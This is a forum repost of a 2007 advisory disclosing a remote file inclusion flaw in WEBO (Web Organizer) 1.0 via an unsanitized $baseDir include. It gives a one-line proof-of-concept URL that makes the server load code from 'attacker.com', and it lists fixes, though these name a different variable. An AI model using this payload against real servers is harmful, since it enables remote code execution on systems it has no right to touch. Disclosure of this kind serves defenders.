Jump to content
Ras

WEBO (Web Organizer) <= 1.0 (baseDir) RFI

Recommended Posts

Posted

Author         : M.Hasran Addahroni
Web : [url]http://echo.or.id/adv/adv67-K-159-2007.txt[/url]
Critical Lvl : Dangerous

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : WEBO (Web Organizer)
version : 1.0
Vendor : [url]http://sourceforge.net/projects/weborganizer/[/url]
Description :

WEBO (Web Organizer) is an open-source Web application suite providing a groupware calendar, a personal address book, a shared contacts directory, and a personal desktop page.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~
- Invalid include function at modules/abook/foldertree.php :

---------------foldertree.php--------------------------------------
<?php

/* memento :
TreeFolder( $label, $url="", $target="", $icon = "", $id="", $options="" )
TreeItem( $label, $url, $target="", $icon="", $options="" )
*/

include_once( "$baseDir/lib/HTML/tree.php");
...
------------------------------------------------------------------

Variables $baseDir are not properly sanitized.
When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.


Poc/Exploit:
~~~~~~~~~

[url]http://www.target.com/[/url][webo_path]/modules/abook/foldertree.php?baseDir==http://attacker.com/evil?


Solution:
~~~~~~

- Sanitize variable $config_dir on affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...